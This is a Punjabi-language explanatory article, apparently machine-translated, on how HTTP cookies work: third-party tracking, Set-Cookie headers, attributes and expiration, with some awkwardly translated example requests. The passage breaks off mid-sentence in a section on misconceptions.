ਉਪਭੋਗਤਾ ਦੀ ਬ੍ਰਾਊਜ਼ਿੰਗ ਨੂੰ ਟਰੈਕ ਕਰਨ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦਾ ਹੈ।
ਥਰਡ-ਪਾਰਟੀ ਕੂਕੀਜ਼ ਅਤੇ ਵੈੱਬ ਬੀਕਨ, ਜੋ ਹੇਠਾਂ ਦੱਸੇ ਗਏ ਹਨ, ਵੱਖ-ਵੱਖ ਸਾਈਟਾਂ 'ਤੇ ਟਰੈਕਿੰਗ ਨੂੰ ਵੀ ਸਮਰੱਥ ਬਣਾਉਂਦੇ ਹਨ। ਸਿੰਗਲ ਸਾਈਟ ਟ੍ਰੈਕਿੰਗ ਆਮ ਤੌਰ 'ਤੇ ਅੰਕੜਿਆਂ ਦੇ ਉਦੇਸ਼ਾਂ ਲਈ ਵਰਤੀ ਜਾਂਦੀ ਹੈ। ਇਸਦੇ ਉਲਟ, ਤੀਜੀ ਧਿਰ ਦੀਆਂ ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹੋਏ ਵੱਖ-ਵੱਖ ਸਾਈਟਾਂ 'ਤੇ ਟ੍ਰੈਕਿੰਗ ਦੀ ਵਰਤੋਂ ਆਮ ਤੌਰ 'ਤੇ ਵਿਗਿਆਪਨ ਕੰਪਨੀਆਂ ਦੁਆਰਾ ਅਗਿਆਤ ਉਪਭੋਗਤਾ ਪ੍ਰੋਫਾਈਲਾਂ ਬਣਾਉਣ ਲਈ ਕੀਤੀ ਜਾਂਦੀ ਹੈ (ਜੋ ਫਿਰ ਇਹ ਨਿਰਧਾਰਤ ਕਰਨ ਲਈ ਵਰਤੀ ਜਾਂਦੀ ਹੈ ਕਿ ਉਪਭੋਗਤਾ ਨੂੰ ਕਿਹੜੇ ਇਸ਼ਤਿਹਾਰ ਦਿਖਾਏ ਜਾਣ ਅਤੇ ਨਾਲ ਹੀ ਉਹਨਾਂ ਨੂੰ ਇਹਨਾਂ ਇਸ਼ਤਿਹਾਰਾਂ ਨਾਲ ਸੰਬੰਧਿਤ ਈਮੇਲਾਂ ਭੇਜਣ ਲਈ - ਸਪੈਮ ).
ਟ੍ਰੈਕਿੰਗ ਕੂਕੀਜ਼ ਉਪਭੋਗਤਾ ਦੀ ਗੋਪਨੀਯਤਾ 'ਤੇ ਹਮਲੇ ਦਾ ਖਤਰਾ ਹਨ ਪਰ ਉਹਨਾਂ ਨੂੰ ਆਸਾਨੀ ਨਾਲ ਮਿਟਾ ਦਿੱਤਾ ਜਾ ਸਕਦਾ ਹੈ। ਜ਼ਿਆਦਾਤਰ ਆਧੁਨਿਕ ਬ੍ਰਾਊਜ਼ਰਾਂ ਵਿੱਚ ਐਪਲੀਕੇਸ਼ਨ ਨੂੰ ਬੰਦ ਕਰਨ ਵੇਲੇ ਸਥਾਈ ਕੂਕੀਜ਼ ਨੂੰ ਆਪਣੇ ਆਪ ਮਿਟਾਉਣ ਦਾ ਵਿਕਲਪ ਸ਼ਾਮਲ ਹੁੰਦਾ ਹੈ।
ਤੀਜੀ ਧਿਰ ਦੀਆਂ ਕੂਕੀਜ਼
ਵੈੱਬ ਪੰਨੇ ਵਿੱਚ ਮੌਜੂਦ ਚਿੱਤਰ ਅਤੇ ਹੋਰ ਵਸਤੂਆਂ ਪੰਨੇ ਦੀ ਮੇਜ਼ਬਾਨੀ ਕਰਨ ਵਾਲੇ ਸਰਵਰਾਂ ਤੋਂ ਵੱਖਰੇ ਸਰਵਰਾਂ 'ਤੇ ਰਹਿ ਸਕਦੀਆਂ ਹਨ। ਪੰਨੇ ਨੂੰ ਪ੍ਰਦਰਸ਼ਿਤ ਕਰਨ ਲਈ, ਬ੍ਰਾਊਜ਼ਰ ਇਹਨਾਂ ਸਾਰੀਆਂ ਵਸਤੂਆਂ ਨੂੰ ਡਾਊਨਲੋਡ ਕਰਦਾ ਹੈ। ਜ਼ਿਆਦਾਤਰ ਵੈੱਬਸਾਈਟਾਂ ਵਿੱਚ ਵੱਖ-ਵੱਖ ਸਰੋਤਾਂ ਤੋਂ ਜਾਣਕਾਰੀ ਹੁੰਦੀ ਹੈ। ਉਦਾਹਰਨ ਲਈ, ਜੇਕਰ ਤੁਸੀਂ ਆਪਣੇ ਬ੍ਰਾਊਜ਼ਰ ਵਿੱਚ www.example.com ਟਾਈਪ ਕਰਦੇ ਹੋ, ਤਾਂ ਅਕਸਰ ਪੰਨੇ ਦੇ ਹਿੱਸੇ 'ਤੇ ਵਸਤੂਆਂ ਜਾਂ ਇਸ਼ਤਿਹਾਰ ਹੋਣਗੇ ਜੋ ਵੱਖ-ਵੱਖ ਸਰੋਤਾਂ ਤੋਂ ਆਉਂਦੇ ਹਨ, ਜਿਵੇਂ ਕਿ www. .example.com ਤੋਂ ਵੱਖਰੇ ਡੋਮੇਨ ਤੋਂ। "ਪਹਿਲੀ" ਪਾਰਟੀ ਕੂਕੀਜ਼ ਉਹ ਕੂਕੀਜ਼ ਹਨ ਜੋ ਬ੍ਰਾਊਜ਼ਰ ਦੇ ਐਡਰੈੱਸ ਬਾਰ ਵਿੱਚ ਸੂਚੀਬੱਧ ਡੋਮੇਨ ਦੁਆਰਾ ਸੈੱਟ ਕੀਤੀਆਂ ਜਾਂਦੀਆਂ ਹਨ। ਤੀਜੀ-ਧਿਰ ਦੀਆਂ ਕੂਕੀਜ਼ ਨੂੰ ਪੰਨੇ ਦੀਆਂ ਵਸਤੂਆਂ ਵਿੱਚੋਂ ਇੱਕ ਦੁਆਰਾ ਸੈੱਟ ਕੀਤਾ ਜਾਂਦਾ ਹੈ ਜੋ ਇੱਕ ਵੱਖਰੇ ਡੋਮੇਨ ਤੋਂ ਆਉਂਦਾ ਹੈ।
ਮੂਲ ਰੂਪ ਵਿੱਚ, Mozilla Firefox, Microsoft Internet Explorer ਅਤੇ Opera ਵਰਗੇ ਬ੍ਰਾਊਜ਼ਰ ਥਰਡ-ਪਾਰਟੀ ਕੂਕੀਜ਼ ਨੂੰ ਸਵੀਕਾਰ ਕਰਦੇ ਹਨ, ਪਰ ਉਪਭੋਗਤਾ ਉਹਨਾਂ ਨੂੰ ਬਲੌਕ ਕਰਨ ਲਈ ਬ੍ਰਾਊਜ਼ਰ ਵਿਕਲਪਾਂ ਵਿੱਚ ਸੈਟਿੰਗਾਂ ਨੂੰ ਬਦਲ ਸਕਦੇ ਹਨ। ਤੀਜੀ-ਧਿਰ ਦੀਆਂ ਕੂਕੀਜ਼ ਵਿੱਚ ਕੋਈ ਸੁਰੱਖਿਆ ਜੋਖਮ ਨਹੀਂ ਹੈ ਜੋ ਵੈੱਬ ਕਾਰਜਕੁਸ਼ਲਤਾ ਨੂੰ ਸਮਰੱਥ ਬਣਾਉਂਦੇ ਹਨ, ਹਾਲਾਂਕਿ ਉਹਨਾਂ ਦੀ ਵਰਤੋਂ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਟਰੈਕ ਕਰਨ ਲਈ ਵੀ ਕੀਤੀ ਜਾਂਦੀ ਹੈ। ਸਾਈਟ ਤੋਂ ਸਾਈਟ ਤੱਕ.
ਗੂਗਲ ਕਰੋਮ ਸਮੇਤ ਸਾਰੇ ਬ੍ਰਾਉਜ਼ਰਾਂ ਲਈ ਉਪਲਬਧ ਗੋਸਟਰੀ ਵਰਗੇ ਟੂਲ ਤੀਜੀ ਧਿਰਾਂ ਵਿਚਕਾਰ ਐਕਸਚੇਂਜ ਨੂੰ ਰੋਕ ਸਕਦੇ ਹਨ।
ਲਾਗੂ ਕਰਨ
ਕੂਕੀਜ਼ ਵੈੱਬ ਸਰਵਰ ਦੁਆਰਾ ਬ੍ਰਾਊਜ਼ਰ ਨੂੰ ਭੇਜੇ ਗਏ ਡੇਟਾ ਦੇ ਛੋਟੇ ਟੁਕੜੇ ਹਨ। ਬ੍ਰਾਊਜ਼ਰ ਉਹਨਾਂ ਨੂੰ ਸਰਵਰ 'ਤੇ ਬਿਨਾਂ ਕਿਸੇ ਬਦਲਾਅ ਦੇ ਵਾਪਸ ਕਰਦਾ ਹੈ, ਸਟੇਟਲੈੱਸ HTTP ਟ੍ਰਾਂਜੈਕਸ਼ਨ ਵਿੱਚ ਸਟੇਟ (ਪਿਛਲੀਆਂ ਘਟਨਾਵਾਂ ਦੀ ਯਾਦ) ਨੂੰ ਪੇਸ਼ ਕਰਦਾ ਹੈ। ਕੂਕੀਜ਼ ਤੋਂ ਬਿਨਾਂ, ਵੈਬ ਪੇਜ ਦੀ ਹਰੇਕ ਪ੍ਰਾਪਤੀ ਜਾਂ ਵੈਬ ਪੇਜ ਦਾ ਇੱਕ ਹਿੱਸਾ ਇੱਕ ਅਲੱਗ-ਥਲੱਗ ਘਟਨਾ ਹੈ, ਉਸੇ ਸਾਈਟ ਤੇ ਕੀਤੀਆਂ ਗਈਆਂ ਹੋਰ ਬੇਨਤੀਆਂ ਤੋਂ ਸੁਤੰਤਰ। ਵੈੱਬ ਸਰਵਰ ਦੁਆਰਾ ਸੈੱਟ ਕੀਤੇ ਜਾਣ ਦੇ ਯੋਗ ਹੋਣ ਤੋਂ ਇਲਾਵਾ, ਕੂਕੀਜ਼ ਨੂੰ ਸਕ੍ਰਿਪਟਿੰਗ ਭਾਸ਼ਾਵਾਂ ਜਿਵੇਂ ਕਿ JavaScript ਦੁਆਰਾ ਵੀ ਸੈੱਟ ਕੀਤਾ ਜਾ ਸਕਦਾ ਹੈ, ਜੇਕਰ ਬ੍ਰਾਊਜ਼ਰ ਦੁਆਰਾ ਸਮਰਥਿਤ ਅਤੇ ਅਧਿਕਾਰਤ ਹੈ।
ਅਧਿਕਾਰਤ ਕੂਕੀ ਨਿਰਧਾਰਨ ਸੁਝਾਅ ਦਿੰਦਾ ਹੈ ਕਿ ਬ੍ਰਾਊਜ਼ਰਾਂ ਨੂੰ ਘੱਟੋ-ਘੱਟ ਕੁਕੀਜ਼ ਨੂੰ ਸੁਰੱਖਿਅਤ ਕਰਨ ਅਤੇ ਦੁਬਾਰਾ ਭੇਜਣ ਦੇ ਯੋਗ ਹੋਣਾ ਚਾਹੀਦਾ ਹੈ। ਖਾਸ ਤੌਰ 'ਤੇ, ਇੱਕ ਬ੍ਰਾਊਜ਼ਰ ਚਾਰ ਕਿਲੋਬਾਈਟ ਹਰ ਇੱਕ ਦੀਆਂ ਘੱਟੋ-ਘੱਟ 300 ਕੂਕੀਜ਼, ਅਤੇ ਇੱਕ ਸਰਵਰ ਜਾਂ ਡੋਮੇਨ ਲਈ ਘੱਟੋ-ਘੱਟ 20 ਕੂਕੀਜ਼ ਸਟੋਰ ਕਰਨ ਦੇ ਯੋਗ ਹੋਣਾ ਚਾਹੀਦਾ ਹੈ।
ਦੇ ਸੈਕਸ਼ਨ 3.1 ਦੇ ਅਨੁਸਾਰ RFC 2965, ਕੂਕੀ ਦੇ ਨਾਮ ਕੇਸ-ਸੰਵੇਦਨਸ਼ੀਲ ਹਨ।
ਇੱਕ ਕੂਕੀ ਆਪਣੀ ਮਿਆਦ ਪੁੱਗਣ ਦੀ ਮਿਤੀ ਨੂੰ ਨਿਸ਼ਚਿਤ ਕਰ ਸਕਦੀ ਹੈ, ਜਿਸ ਸਥਿਤੀ ਵਿੱਚ ਇਸ ਮਿਤੀ ਨੂੰ ਕੂਕੀ ਨੂੰ ਮਿਟਾ ਦਿੱਤਾ ਜਾਵੇਗਾ। ਜੇਕਰ ਕੂਕੀ ਇੱਕ ਮਿਆਦ ਪੁੱਗਣ ਦੀ ਤਾਰੀਖ ਨਹੀਂ ਦੱਸਦੀ ਹੈ, ਤਾਂ ਜਿਵੇਂ ਹੀ ਉਪਭੋਗਤਾ ਆਪਣੇ ਬ੍ਰਾਊਜ਼ਰ ਨੂੰ ਛੱਡਦਾ ਹੈ ਕੂਕੀ ਨੂੰ ਮਿਟਾ ਦਿੱਤਾ ਜਾਂਦਾ ਹੈ। ਇਸ ਲਈ, ਇੱਕ ਮਿਆਦ ਪੁੱਗਣ ਦੀ ਮਿਤੀ ਨਿਰਧਾਰਤ ਕਰਨਾ ਕੂਕੀ ਨੂੰ ਮਲਟੀਪਲ ਸੈਸ਼ਨਾਂ ਦੁਆਰਾ ਬਚਣ ਦਾ ਇੱਕ ਤਰੀਕਾ ਹੈ। ਇਸ ਕਾਰਨ ਕਰਕੇ, ਮਿਆਦ ਪੁੱਗਣ ਦੀ ਮਿਤੀ ਵਾਲੀਆਂ ਕੂਕੀਜ਼ ਨੂੰ ਕਿਹਾ ਜਾਂਦਾ ਹੈ ਲਗਾਤਾਰ. ਇੱਕ ਉਦਾਹਰਨ ਐਪਲੀਕੇਸ਼ਨ: ਇੱਕ ਰਿਟੇਲ ਸਾਈਟ ਉਹਨਾਂ ਆਈਟਮਾਂ ਨੂੰ ਰਿਕਾਰਡ ਕਰਨ ਲਈ ਲਗਾਤਾਰ ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਕਰ ਸਕਦੀ ਹੈ ਜੋ ਉਪਭੋਗਤਾਵਾਂ ਨੇ ਉਹਨਾਂ ਦੇ ਸ਼ਾਪਿੰਗ ਕਾਰਟ ਵਿੱਚ ਰੱਖੇ ਹਨ (ਅਸਲ ਵਿੱਚ, ਕੂਕੀ ਵਿਕਰੀ ਦੀ ਸਾਈਟ 'ਤੇ ਇੱਕ ਡੇਟਾਬੇਸ ਵਿੱਚ ਸੁਰੱਖਿਅਤ ਕੀਤੀ ਐਂਟਰੀ ਦਾ ਹਵਾਲਾ ਦੇ ਸਕਦੀ ਹੈ, ਨਾ ਕਿ ਤੁਹਾਡੇ ਕੰਪਿਊਟਰ ਵਿੱਚ) . ਇਸ ਦੇ ਜ਼ਰੀਏ, ਜੇਕਰ ਉਪਭੋਗਤਾ ਖਰੀਦਦਾਰੀ ਕੀਤੇ ਬਿਨਾਂ ਆਪਣੇ ਬ੍ਰਾਊਜ਼ਰ ਨੂੰ ਛੱਡ ਦਿੰਦੇ ਹਨ ਅਤੇ ਬਾਅਦ ਵਿੱਚ ਇਸ 'ਤੇ ਵਾਪਸ ਆਉਂਦੇ ਹਨ, ਤਾਂ ਉਹ ਕਾਰਟ ਵਿੱਚ ਆਈਟਮਾਂ ਨੂੰ ਦੁਬਾਰਾ ਲੱਭ ਸਕਣਗੇ। ਜੇਕਰ ਇਹਨਾਂ ਕੂਕੀਜ਼ ਨੇ ਮਿਆਦ ਪੁੱਗਣ ਦੀ ਤਾਰੀਖ ਨਹੀਂ ਦਿੱਤੀ, ਤਾਂ ਬ੍ਰਾਊਜ਼ਰ ਦੇ ਬੰਦ ਹੋਣ 'ਤੇ ਉਹਨਾਂ ਦੀ ਮਿਆਦ ਖਤਮ ਹੋ ਜਾਵੇਗੀ, ਅਤੇ ਟੋਕਰੀ ਦੀ ਸਮੱਗਰੀ 'ਤੇ ਜਾਣਕਾਰੀ ਖਤਮ ਹੋ ਜਾਵੇਗੀ।
ਕੂਕੀਜ਼ ਨੂੰ ਕਿਸੇ ਖਾਸ ਡੋਮੇਨ, ਸਬਡੋਮੇਨ ਜਾਂ ਸਰਵਰ 'ਤੇ ਮਾਰਗ ਤੱਕ ਸੀਮਿਤ ਕੀਤਾ ਜਾ ਸਕਦਾ ਹੈ ਜਿਸ ਨੇ ਉਹਨਾਂ ਨੂੰ ਬਣਾਇਆ ਹੈ।
ਇੱਕ ਕੂਕੀ ਦੀ ਰਚਨਾ
ਵੈਬ ਪੇਜਾਂ ਦਾ ਟ੍ਰਾਂਸਫਰ ਹਾਈਪਰ ਟੈਕਸਟ ਟ੍ਰਾਂਸਫਰ ਪ੍ਰੋਟੋਕੋਲ (HTTP) ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਕੀਤਾ ਜਾਂਦਾ ਹੈ। ਕੂਕੀਜ਼ ਨੂੰ ਨਜ਼ਰਅੰਦਾਜ਼ ਕਰਕੇ, ਬ੍ਰਾਊਜ਼ਰ ਵੈੱਬ ਸਰਵਰਾਂ ਤੋਂ ਇੱਕ ਪੰਨੇ ਨੂੰ ਕਾਲ ਕਰਦੇ ਹਨ ਉਹਨਾਂ ਨੂੰ ਇੱਕ ਛੋਟਾ ਟੈਕਸਟ ਭੇਜ ਕੇ HTTP ਬੇਨਤੀ. ਉਦਾਹਰਨ ਲਈ, www.example.org/index.html ਪੰਨੇ ਤੱਕ ਪਹੁੰਚ ਕਰਨ ਲਈ, ਬ੍ਰਾਊਜ਼ਰ ਸਰਵਰ www.example.org ਨਾਲ ਜੁੜਦੇ ਹਨ ਅਤੇ ਇੱਕ ਬੇਨਤੀ ਭੇਜਦੇ ਹਨ ਜੋ ਇਸ ਤਰ੍ਹਾਂ ਦਿਖਾਈ ਦਿੰਦਾ ਹੈ:
| /index.html HTTP/1.1ਹੋਸਟ ਪ੍ਰਾਪਤ ਕਰੋ: www.example.org | ||
| ਅਤ | → | ਸਰਵਰ |
ਸਰਵਰ ਬੇਨਤੀ ਕੀਤੇ ਪੰਨੇ ਨੂੰ ਭੇਜ ਕੇ ਜਵਾਬ ਦਿੰਦਾ ਹੈ, ਇਸ ਤੋਂ ਪਹਿਲਾਂ ਇੱਕ ਸਮਾਨ ਟੈਕਸਟ, ਪੂਰਾ ਕਾਲ ਕੀਤਾ ਜਾ ਰਿਹਾ ਹੈ HTTP ਜਵਾਬ. ਇਸ ਪੈਕੇਟ ਵਿੱਚ ਕੂਕੀਜ਼ ਨੂੰ ਸਟੋਰ ਕਰਨ ਲਈ ਬ੍ਰਾਊਜ਼ਰ ਨੂੰ ਨਿਰਦੇਸ਼ ਦੇਣ ਵਾਲੀਆਂ ਲਾਈਨਾਂ ਹੋ ਸਕਦੀਆਂ ਹਨ:
| HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (HTML ਪੰਨਾ) | ||
| ਅਤ | ← | ਸਰਵਰ |
ਸਰਵਰ ਸਿਰਫ਼ ਸੈੱਟ-ਕੂਕੀ ਲਾਈਨ ਭੇਜਦਾ ਹੈ, ਜੇਕਰ ਸਰਵਰ ਚਾਹੁੰਦਾ ਹੈ ਕਿ ਬ੍ਰਾਊਜ਼ਰ ਇੱਕ ਕੂਕੀ ਸਟੋਰ ਕਰੇ। ਸੈੱਟ-ਕੂਕੀ ਨਾਮ=ਮੁੱਲ ਸਤਰ ਨੂੰ ਸਟੋਰ ਕਰਨ ਅਤੇ ਸਰਵਰ ਨੂੰ ਭਵਿੱਖ ਦੀਆਂ ਸਾਰੀਆਂ ਬੇਨਤੀਆਂ ਵਿੱਚ ਇਸਨੂੰ ਵਾਪਸ ਕਰਨ ਲਈ ਬ੍ਰਾਊਜ਼ਰ ਲਈ ਇੱਕ ਬੇਨਤੀ ਹੈ। ਜੇਕਰ ਬ੍ਰਾਊਜ਼ਰ ਕੂਕੀਜ਼ ਦਾ ਸਮਰਥਨ ਕਰਦਾ ਹੈ ਅਤੇ ਬ੍ਰਾਊਜ਼ਰ ਵਿਕਲਪਾਂ ਵਿੱਚ ਕੂਕੀਜ਼ ਸਮਰਥਿਤ ਹਨ, ਤਾਂ ਕੂਕੀ ਨੂੰ ਉਸੇ ਸਰਵਰ ਨੂੰ ਕੀਤੀਆਂ ਸਾਰੀਆਂ ਅਗਲੀਆਂ ਬੇਨਤੀਆਂ ਵਿੱਚ ਸ਼ਾਮਲ ਕੀਤਾ ਜਾਵੇਗਾ। ਉਦਾਹਰਨ ਲਈ, ਬ੍ਰਾਊਜ਼ਰ www.example.org/news.html ਸਰਵਰ ਨੂੰ ਹੇਠਾਂ ਦਿੱਤੀ ਬੇਨਤੀ ਭੇਜ ਕੇ www.example.org/news.html ਨੂੰ ਕਾਲ ਕਰਦਾ ਹੈ:
| ਪ੍ਰਾਪਤ ਕਰੋ /news.html HTTP/1.1ਹੋਸਟ: www.example.orgCookie: name=valueAccept: */* | ||
| ਅਤ | → | ਸਰਵਰ |
ਇਹ ਉਸੇ ਸਰਵਰ ਤੋਂ ਕਿਸੇ ਹੋਰ ਪੰਨੇ ਲਈ ਬੇਨਤੀ ਹੈ, ਅਤੇ ਉਪਰੋਕਤ ਪਹਿਲੇ ਤੋਂ ਵੱਖਰਾ ਹੈ ਕਿਉਂਕਿ ਇਸ ਵਿੱਚ ਇੱਕ ਸਤਰ ਹੈ ਜੋ ਸਰਵਰ ਨੇ ਪਹਿਲਾਂ ਬ੍ਰਾਊਜ਼ਰ ਨੂੰ ਭੇਜੀ ਸੀ। ਇਸਦਾ ਅਰਥ ਹੈ, ਸਰਵਰ ਜਾਣਦਾ ਹੈ ਕਿ ਇਹ ਬੇਨਤੀ ਪਿਛਲੇ ਇੱਕ ਨਾਲ ਜੁੜੀ ਹੋਈ ਹੈ. ਸਰਵਰ ਕਾਲ ਕੀਤੇ ਪੇਜ ਨੂੰ ਭੇਜ ਕੇ, ਅਤੇ ਇਸ ਵਿੱਚ ਹੋਰ ਕੂਕੀਜ਼ ਜੋੜ ਕੇ ਜਵਾਬ ਦਿੰਦਾ ਹੈ।
ਕੂਕੀ ਦੇ ਮੁੱਲ ਨੂੰ ਸਰਵਰ ਦੁਆਰਾ ਇੱਕ ਨਵੀਂ ਲਾਈਨ Set-Cookie ਭੇਜ ਕੇ ਬਦਲਿਆ ਜਾ ਸਕਦਾ ਹੈ: name=new_value ਕਹਿੰਦੇ ਹੋਏ ਪੰਨੇ ਦੇ ਜਵਾਬ ਵਿੱਚ। ਬ੍ਰਾਊਜ਼ਰ ਫਿਰ ਪੁਰਾਣੇ ਮੁੱਲ ਨੂੰ ਨਵੇਂ ਨਾਲ ਬਦਲਦਾ ਹੈ।
ਸੈੱਟ-ਕੂਕੀ ਲਾਈਨ ਆਮ ਤੌਰ 'ਤੇ ਇੱਕ CGI ਪ੍ਰੋਗਰਾਮ ਜਾਂ ਹੋਰ ਸਕ੍ਰਿਪਟਿੰਗ ਭਾਸ਼ਾ ਦੁਆਰਾ ਬਣਾਈ ਜਾਂਦੀ ਹੈ, HTTP ਸਰਵਰ ਦੁਆਰਾ ਨਹੀਂ। HTTP ਸਰਵਰ (ਉਦਾਹਰਨ: ਅਪਾਚੇ) ਸਿਰਫ਼ ਪ੍ਰੋਗਰਾਮ ਦੇ ਨਤੀਜੇ (ਕੂਕੀਜ਼ ਵਾਲੇ ਸਿਰਲੇਖ ਤੋਂ ਪਹਿਲਾਂ ਵਾਲਾ ਦਸਤਾਵੇਜ਼) ਬ੍ਰਾਊਜ਼ਰ ਨੂੰ ਭੇਜੇਗਾ।
ਕੂਕੀਜ਼ ਨੂੰ JavaScript ਜਾਂ ਬ੍ਰਾਊਜ਼ਰ ਵਿੱਚ ਚੱਲ ਰਹੀਆਂ ਹੋਰ ਸਮਾਨ ਭਾਸ਼ਾਵਾਂ ਦੁਆਰਾ ਵੀ ਸੈੱਟ ਕੀਤਾ ਜਾ ਸਕਦਾ ਹੈ, ਭਾਵ ਸਰਵਰ ਸਾਈਡ ਦੀ ਬਜਾਏ ਕਲਾਇੰਟ ਸਾਈਡ 'ਤੇ। JavaScript ਵਿੱਚ, document.cookie ਆਬਜੈਕਟ ਦੀ ਵਰਤੋਂ ਇਸ ਉਦੇਸ਼ ਲਈ ਕੀਤੀ ਜਾਂਦੀ ਹੈ। ਉਦਾਹਰਨ ਲਈ, ਸਟੇਟਮੈਂਟ document.cookie = "temperature=20" "temperature" ਨਾਮਕ ਅਤੇ 20 ਦੇ ਮੁੱਲ ਨਾਲ ਇੱਕ ਕੂਕੀ ਬਣਾਉਂਦਾ ਹੈ।
ਇੱਕ ਕੂਕੀ ਦੇ ਗੁਣ
ਨਾਮ/ਮੁੱਲ ਜੋੜੇ ਤੋਂ ਇਲਾਵਾ, ਇੱਕ ਕੂਕੀ ਵਿੱਚ ਇੱਕ ਮਿਆਦ ਪੁੱਗਣ ਦੀ ਮਿਤੀ, ਇੱਕ ਮਾਰਗ, ਇੱਕ ਡੋਮੇਨ ਨਾਮ ਅਤੇ ਕਨੈਕਸ਼ਨ ਦੀ ਕਿਸਮ ਵੀ ਸ਼ਾਮਲ ਹੋ ਸਕਦੀ ਹੈ, ਜਿਵੇਂ ਕਿ ਆਮ ਜਾਂ ਐਨਕ੍ਰਿਪਟਡ। RFC 2965 ਇਹ ਵੀ ਪਰਿਭਾਸ਼ਿਤ ਕਰਦਾ ਹੈ ਕਿ ਕੂਕੀਜ਼ ਦਾ ਇੱਕ ਲਾਜ਼ਮੀ ਸੰਸਕਰਣ ਨੰਬਰ ਹੋਣਾ ਚਾਹੀਦਾ ਹੈ, ਪਰ ਇਸਨੂੰ ਆਮ ਤੌਰ 'ਤੇ ਛੱਡ ਦਿੱਤਾ ਜਾਂਦਾ ਹੈ। ਇਹ ਡਾਟਾ ਭਾਗ name=new_value ਪੇਅਰ ਦਾ ਅਨੁਸਰਣ ਕਰਦੇ ਹਨ ਅਤੇ ਸੈਮੀਕੋਲਨ ਦੁਆਰਾ ਵੱਖ ਕੀਤੇ ਜਾਂਦੇ ਹਨ। ਉਦਾਹਰਨ ਲਈ, ਸਰਵਰ ਦੁਆਰਾ ਇੱਕ ਸੈੱਟ-ਕੂਕੀ ਲਾਈਨ ਭੇਜ ਕੇ ਇੱਕ ਕੂਕੀ ਬਣਾਈ ਜਾ ਸਕਦੀ ਹੈ: name=new_value; ਮਿਆਦ = ਮਿਤੀ; ਮਾਰਗ =/; domain=.example.org.
ਇੱਕ ਕੂਕੀ ਦੀ ਮਿਆਦ ਸਮਾਪਤੀ
ਕੂਕੀਜ਼ ਦੀ ਮਿਆਦ ਪੁੱਗ ਜਾਂਦੀ ਹੈ ਅਤੇ ਫਿਰ ਹੇਠ ਲਿਖੀਆਂ ਸਥਿਤੀਆਂ ਵਿੱਚ ਬ੍ਰਾਊਜ਼ਰ ਦੁਆਰਾ ਸਰਵਰ ਨੂੰ ਨਹੀਂ ਭੇਜੀਆਂ ਜਾਂਦੀਆਂ ਹਨ:
- ਜਦੋਂ ਬ੍ਰਾਊਜ਼ਰ ਬੰਦ ਹੁੰਦਾ ਹੈ, ਜੇਕਰ ਕੂਕੀ ਨਿਰੰਤਰ ਨਹੀਂ ਹੈ।
- ਜਦੋਂ ਕੂਕੀ ਦੀ ਮਿਆਦ ਪੁੱਗ ਗਈ ਹੈ।
- ਜਦੋਂ ਕੂਕੀ ਦੀ ਮਿਆਦ ਪੁੱਗਣ ਦੀ ਮਿਤੀ (ਸਰਵਰ ਜਾਂ ਸਕ੍ਰਿਪਟ ਦੁਆਰਾ) ਨੂੰ ਅਤੀਤ ਵਿੱਚ ਇੱਕ ਮਿਤੀ ਵਿੱਚ ਬਦਲਿਆ ਜਾਂਦਾ ਹੈ।
- ਜਦੋਂ ਬ੍ਰਾਊਜ਼ਰ ਉਪਭੋਗਤਾ ਦੀ ਬੇਨਤੀ 'ਤੇ ਕੂਕੀ ਨੂੰ ਮਿਟਾ ਦਿੰਦਾ ਹੈ।
ਤੀਜੀ ਸਥਿਤੀ ਸਰਵਰਾਂ ਜਾਂ ਸਕ੍ਰਿਪਟਾਂ ਨੂੰ ਕੂਕੀ ਨੂੰ ਸਪਸ਼ਟ ਤੌਰ 'ਤੇ ਮਿਟਾਉਣ ਦੀ ਆਗਿਆ ਦਿੰਦੀ ਹੈ। ਨੋਟ ਕਰੋ ਕਿ Google Chrome ਵੈੱਬ ਬ੍ਰਾਊਜ਼ਰ ਨਾਲ ਸਮੱਗਰੀ ਸੈਟਿੰਗਾਂ ਨੂੰ ਐਕਸੈਸ ਕਰਕੇ ਕਿਸੇ ਖਾਸ ਕੂਕੀ ਦੀ ਮਿਆਦ ਪੁੱਗਣ ਦੀ ਮਿਤੀ ਨੂੰ ਜਾਣਨਾ ਸੰਭਵ ਹੈ। ਕੰਪਿਊਟਰ 'ਤੇ ਰੱਖਿਅਤ ਕੀਤੀ ਕੁਕੀ ਕਈ ਦਹਾਕਿਆਂ ਤੱਕ ਉੱਥੇ ਰਹਿ ਸਕਦੀ ਹੈ ਜੇਕਰ ਇਸ ਨੂੰ ਮਿਟਾਉਣ ਲਈ ਕੋਈ ਪ੍ਰਕਿਰਿਆ ਨਹੀਂ ਕੀਤੀ ਜਾਂਦੀ।
ਭੁਲੇਖੇ
ਇੰਟਰਨੈਟ ਤੇ ਉਹਨਾਂ ਦੀ ਜਾਣ-ਪਛਾਣ ਤੋਂ ਬਾਅਦ, ਕੂਕੀਜ਼ ਬਾਰੇ ਬਹੁਤ ਸਾਰੇ ਵਿਚਾਰ ਇੰਟਰਨੈਟ ਅਤੇ ਮੀਡੀਆ ਵਿੱਚ ਪ੍ਰਸਾਰਿਤ ਹੋਏ ਹਨ। 1998 ਵਿੱਚ, CIAC, ਇੱਕ ਸੰਯੁਕਤ ਰਾਜ ਡਿਪਾਰਟਮੈਂਟ ਆਫ਼ ਐਨਰਜੀ ਕੰਪਿਊਟਰ ਘਟਨਾ ਨਿਗਰਾਨੀ ਟੀਮ, ਨੇ ਇਹ ਨਿਰਧਾਰਿਤ ਕੀਤਾ ਕਿ ਕੂਕੀ ਸੁਰੱਖਿਆ ਕਮਜ਼ੋਰੀਆਂ "ਜ਼ਰੂਰੀ ਤੌਰ 'ਤੇ ਗੈਰ-ਮੌਜੂਦ" ਸਨ ਅਤੇ ਸਮਝਾਇਆ ਕਿ "ਤੁਹਾਡੀਆਂ ਮੁਲਾਕਾਤਾਂ ਦੇ ਮੂਲ ਅਤੇ ਤੁਹਾਡੇ ਦੁਆਰਾ ਵੇਖੇ ਗਏ ਵੈਬ ਪੇਜਾਂ ਦੇ ਵੇਰਵਿਆਂ ਬਾਰੇ ਜਾਣਕਾਰੀ। ਵੈੱਬ ਸਰਵਰਾਂ ਦੀਆਂ ਲੌਗ ਫਾਈਲਾਂ ਵਿੱਚ 